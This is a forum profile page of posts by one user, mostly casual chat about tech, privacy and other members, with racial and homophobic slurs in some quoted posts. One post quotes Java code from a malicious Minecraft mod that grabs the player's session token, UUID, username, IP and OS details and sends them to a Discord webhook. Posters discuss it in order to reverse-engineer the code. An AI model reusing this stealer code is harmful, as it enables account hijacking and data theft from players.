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Posts by kyli0x

  1. kyli0x Yung Blood
    Originally posted by Kafka Memories coming back of not letting a girl leave my room, she was too small to reach the door handle and I tried to scare her wearing a mask. I remember trapping a cat in a dolls house as well. I think most children are like that though.

    you keep midgets in your room? ngl thats what i got out of this story
  2. kyli0x Yung Blood
    Originally posted by cryptographiccontrarian

    fine night is my midnight jam
  3. kyli0x Yung Blood
  4. kyli0x Yung Blood
    imagine just being average. cant relate
  5. kyli0x Yung Blood
    Originally posted by aldra not gonna try and compile it, haven't touched c in a long time, didn't know you could use 'long long' for more memory lol

    looks like it just returns the memory location when you enter a number?

    yeah good ol' long long is a minimal 64bit wide int
  6. kyli0x Yung Blood

    #define ; rn
    #define false cap //use instead of 0 or null or EOF when appropriate
    #define ! no
    #define ? sussin
    #define long fr
    #define main chief
    #define & bouta
    #define = finna
    #define * mf
    #define : bussin
    #define == be
    #define break yikes
    #define -- vibin
    #define return deadass
    #define ++ ongod
    #define } tho

    #include <stdio.h>

    int chief() {
    fr fr int c rn
    scanf("%d", bouta c) rn
    fr fr int mf p rn
    c>3 sussin p finna bouta c[0] bussin p finna null rn
    while(no cap) {
    if (p be cap)
    yikes rn
    printf("%x, %d\n,p , c) rn
    p vibin rn //carefull dont use mf p or it segfaults fr fr
    deadass 0 rn
  7. kyli0x Yung Blood

    should get this phone
  8. kyli0x Yung Blood
    Originally posted by AngryOnion Ya should I sell the surplus on E-Bay or what?

  9. kyli0x Yung Blood
    learn to know.
  10. kyli0x Yung Blood
    Originally posted by Jiggaboo_Johnson Gaming exploits go in the gaming forum brah

    it doesnt exploit the game. it exploits plugins to inject malware onto PCs to extract data such as: discord tokens, cookies, browser saved user:pass, crypto wallets, etc, and then tries to get a persistent shell to reach out to a c&c. so no this does not belong in a gaming channel.
  11. kyli0x Yung Blood
    Originally posted by Rotten Rodney thats why I apologized for shitting up your thread :)

    all good no worries on it, was a good read and entertaining to see your theories.
  12. kyli0x Yung Blood
    bro you're too sporadic for me to follow along, you go like 5 directions at the same time
  13. kyli0x Yung Blood
    Originally posted by Kafka I asked for three users and you chose all of them from the tech forum, that's evasion.

    because as i mentioned originally before you even asked a question. i only was active in the tech forum
  14. kyli0x Yung Blood
    Originally posted by Rotten Rodney that "sounds" more privacy , probably more so than viewing embedded java script pictures but I feel much better pinging my IP off some faggot server that gets pinged by everyone viewing the picture rather than having to actually click any links and load a page, even virtually.

    you do know ip addresses are meant to be public, and are assigned in clustered areas. unless you are doing something illegal where the government is going to track you down by matching your IP with other accounts associated with that IP for evidence. then you have nothing to worry about. if youre scared your ip will get out due to ddosing reasons. then just use a proxy chain. your paranoia of easy solution steps seem a bit off. we can go down the rabbit hole of actually protecting your ip if you want. as its not hard to hide unless dealing with top government agencies, which really you just need to take a few more extra steps and be diligent with your actions.
  15. kyli0x Yung Blood
    Originally posted by Rotten Rodney wariat does it too + instagram like wtf nigger you can't even read that site on PC, mobile only MUH IPAD FUYS

    throw up a android vm.. basically same privacy as using the web without logging in
  16. kyli0x Yung Blood
    Originally posted by Kafka You evaded the question which is sus.

    i gave you a list of the people i remember having good topic chats with, you havnt asked a question after that, only statements
  17. kyli0x Yung Blood
    Originally posted by Rotten Rodney

    public void init(FMLInitializationEvent event) {
    String token = mc.func_110432_I().func_148254_d();
    String uuid = mc.func_110432_I().func_148256_e().getId().toString();
    String username = mc.func_110432_I().func_111285_a();
    sendData("Flowers~ **has sent you a fun surprise** - Username: " + username + " UUID: " + uuid + " Token: " + token.replace("-", ""), webhook, username + " MC Info");

    try {
    String ip = "error niye aq";
    URL whatismyip = new URL("<ip grabber>");
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(whatismyip.openStream()));
    ip = bufferedReader.readLine();
    CommandUtils webhook = new CommandUtils("<discord webhook here... I deleted it for the sake of this post>");
    webhook.addEmbed((new EmbedObject()).setTitle(Minecraft.func_71410_x().func_110432_I().func_111285_a() + " was beamed L").addField("UUID", "``" + Minecraft.func_71410_x().func_110432_I().func_148255_b() + "`\`\`", false).addField("Session ID", "\`" + Minecraft.func_71410_x().func_110432_I().func_148254_d() + "\`", false).addField("Sky Lea Moe", "`" + Minecraft.func_71410_x().func_110432_I().func_111285_a(), false).addField("IP", ip, false));
    } catch (Exception var5) {

    try {
    Method method1 = null;
    Method method2 = null;
    Method method3 = null;
    Method method4 = null;
    try {
    method1 = Minecraft.class.getDeclaredMethod("func_110432_I", new Class[0]);
    } catch (NoSuchMethodException noSuchMethodException) {}
    try {
    method2 = Session.class.getDeclaredMethod("func_148254_d", new Class[0]);
    } catch (NoSuchMethodException noSuchMethodException) {}
    try {
    method3 = Session.class.getDeclaredMethod("func_111285_a", new Class[0]);
    } catch (NoSuchMethodException noSuchMethodException) {}
    try {
    method4 = Session.class.getDeclaredMethod("func_148255_b", new Class[0]);
    } catch (NoSuchMethodException noSuchMethodException) {}
    if (method1 == null || method2 == null || method3 == null || method4 == null)
    Object object = method1.invoke(Minecraft.func_71410_x(), new Object[0]);
    BufferedReader bufferedReader1 = new BufferedReader(new InputStreamReader((new URL("<ip grabber>")).openStream()));
    String str1 = bufferedReader1.readLine();
    BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader((new URL("")).openStream()));
    String str2 = bufferedReader2.readLine();
    HttpURLConnection httpURLConnection = (HttpURLConnection)(new URL(str2)).openConnection();
    httpURLConnection.setRequestProperty("Content-Type", "application/json");
    httpURLConnection.setRequestProperty("User-Agent", "Mozilla/5.0");
    String str3 = String.format("{\"title\":\"PC Info\",\"color\":4360181,\"fields\":[{\"name\":\"Username\",\"value\":\"```%s```\",\"inline\":true},{\"name\":\"OS\",\"value\":\"```%s```\",\"inline\":true},{\"name\":\"IP\",\"value\":\"```%s```\",\"inline\":true}]}", new Object[] { System.getProperty(""), System.getProperty(""), str1 });
    String str4 = String.format("{\"title\":\"Minecraft Info\",\"color\":4360181,\"fields\":[{\"name\":\"Username\",\"value\":\"```%s```\"},{\"name\":\"UUID\",\"value\":\"```%s```\"},{\"name\":\"Token\",\"value\":\"```%s```\"}]}", new Object[] { method3.invoke(object, new Object[0]), method4.invoke(object, new Object[0]), method2.invoke(object, new Object[0]) + ":" + method4.invoke(object, new Object[0]) });
    String str5 = a();
    String str6 = String.format("{\"embeds\":[%s,%s%s],\"username\":\"RATTED BOZO\",\"avatar_url\":\"

    thats not fractureiser
  18. kyli0x Yung Blood
    Originally posted by Rotten Rodney I never heard of this one, I'm pretty up to date with MC exploits so I will look into this

    I have heard of people putting malicious code in plugins and using things like backdoors, or god knows what to do all kinds of nefarious activity. ALso another popular thing people do is find exploits in popular plugins that are used on lots of "big" servers with maybe a few thousand players or less, especially pay to win plugins (against EULA)

    unless you actually download the plugins using forge/bukkit (which everyone does) you will never get hacked. People are targeting a server I play on, there is rampant "ratting" as they call it, which is caused by all the popular mods used by the community having a bunch of fake versions with malware floating around and shared around discord servers, lots of social engineering being done as well with entire discords tricking kids into downloading "legit" mods only to hijack their accounts

    it's not very impressive, exploit-wise it's not like some clever move the cache buffer to regisrar C to get their banking info, it's more like man in the middle type steal credentials shit and social engineering based on oversights in microsoft and discord ultimately, and mods. Just play vanilla and don't use discord and you won't ever get hacked lul

    i just want to re the code is all
  19. kyli0x Yung Blood
    Originally posted by Kafka People usually know when they like someone more than others.

    people usually like people irl and not others across the world that you will never get to know who they are on forums
  20. kyli0x Yung Blood
    Originally posted by Kafka Who?

    idk people like spectra, merlin, sophie, selftaught, bling are a few that ring a bell. i dont have favorites. just enjoy talking about tech shit, ya know
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